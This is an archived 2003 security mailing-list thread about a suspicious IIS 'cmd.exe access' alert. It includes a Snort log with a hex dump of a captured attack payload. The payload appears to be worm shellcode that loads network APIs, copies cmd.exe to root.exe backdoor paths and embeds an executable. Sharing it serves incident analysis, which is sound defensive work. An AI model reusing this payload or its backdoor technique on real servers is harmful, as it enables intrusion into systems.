Security Incidents mailing list archives

RE: strange cmd.exe access

From: "MacDougall, Shane" <smacdougall () idanalytics com>
Date: Wed, 4 Jun 2003 21:22:03 -0700
We saw the exact same packets attack our network from 3 different hosts.
It appears that somehow this attack successfully breached a "hardened"
IIS box. URLScan reported several typical Code Red type traffic from the
attacking IPs, and although the IIS log was scrubbed of some suspicious
activity, our syslogs and IDS indicated that the attack was successful.

Any info on these attack packets would be greatly appreciated.

Regards.
Shane

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Shane MacDougall
Lead Security Officer
ID Analytics
San Diego, California USA
Direct: (858) 427-2860
Toll Free: 866-240-4484 x 2860
Fax: 858-427-2899
 

-----Original Message-----
From: Q [mailto:quentyn () the-q co uk] 
Sent: Thursday, May 29, 2003 12:10 PM
To: incidents () securityfocus com
Subject: strange cmd.exe access 

Hi I saw this packet 

#(3 - 261684) [2003-05-09 19:43:00] [snort/1002]  WEB-IIS cmd.exe access
IPv4: 194.204.X.X -> X.X.X.X
      hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116
chksum=60435
TCP:  port=27761 -> dport: 80  flags=***A**** seq=915915841
      ack=1210973630 off=5 res=0 win=17184 urp=0 chksum=16151
Payload:  length = 1432

000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C   .u..U..E......Gl
010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC   obalAddAtomA..u.
020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65   .U..E......Close
030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0   Handle..u..U..E.
040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC   ....._lcreat..u.
050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69   .U..E......_lwri
060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00   te..u..U..E.....
070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89   ._lclose..u..U..
080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D   E......GetSystem
090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B   Time..u..U..E...
0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55   ...WS2_32.DLL..U
0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00   ..E......socket.
0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C   .u..U..E......cl
0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8   osesocket..u..U.
0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63   .E......ioctlsoc
0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00   ket..u..U..E....
100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8   ..connect..u..U.
110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF   .E......select..
120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E   u..U..E......sen
130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00   d..u..U..E......
140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C   recv..u..U..E...
150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF   ...gethostname..
160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74   u..U..E......get
170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55   hostbyname..u..U
180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C   ..E......WSAGetL
190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89   astError..u..U..
1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C   E......USER32.DL
1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69   L..U..E......Exi
1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55   tWindowsEx..u..U
1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89   ..E...E.i.....@.
1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8   E....xV4........
1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF   ....<.t.<.t.....
200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC   ................
210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF   ................
220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF   ..... ..........
230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF   ................
240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7   .........Y...#..
250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB   .#.X......t...
260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00   .t.;.X...t..h...
270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE   ...\...P.U....\.
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00   .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A   ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73   \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D   \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00   .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D   d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44   on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19   C\root.exe...$..
300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC   ..\...P.U.......
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00   MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC   ........@.......
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD   .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B   *%).............
350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00   ................
360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00   ........ ....@..
370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03   ................
380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00   ........@.......
390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00   ............ ...
3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00   ................
3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC   ........0.......
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10   ................
3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00   ................
3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00   ...... ..`......
400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C   ....... ........
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00   ..............@.
420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30   ...............0
430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00   ................
440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC   ......@.........
450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00   ................
480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00   ......h....h. @.
490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00   .a...... @... @.
4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00   ....j.h. @..L...
4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB   .....h.'...1....
4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20   .h.$@.h?...j.h. 
4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26   @.h.....2.....u&
4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00   j.hT @.j.j.hH @.
4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40   .5.$@.......5.$@
500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00   ......h.$@.h?...
510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00   j.hX @.h........
520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD   ...uU.. @..L....
530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00   . @..B...j.h. @.
540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8   j.j.h. @..5.$@..
550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68   ....j.h. @.j.j.h
560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF   . @..5.$@.......
570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40   5.$@..........$@
580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68   .....h.$@.h. @.h
590 : D4 24 40 00 6A 00 55 FF                           .$@.j.U.

what is strange is that the cmd.exe / root.exe stuff is half way through
with some other code before it 

the ip it hit was not mapped to anything ( I believe it is unused) so
this
can not have been part of another tcp converstion


any ideas ?


--
The should be a sig here, but it got bored and wandered off 


------------------------------------------------------------------------
----
------------------------------------------------------------------------
----


----------------------------------------------------------------------------
----------------------------------------------------------------------------
Current thread:

Re: strange cmd.exe access Valdis . Kletnieks (Jun 01)
- <Possible follow-ups>
- Re: strange cmd.exe access H Carvey (Jun 01)
- Re: strange cmd.exe access adam (Jun 01)
- RE: strange cmd.exe access Frank Knobbe (Jun 01)
- RE: strange cmd.exe access MacDougall, Shane (Jun 05)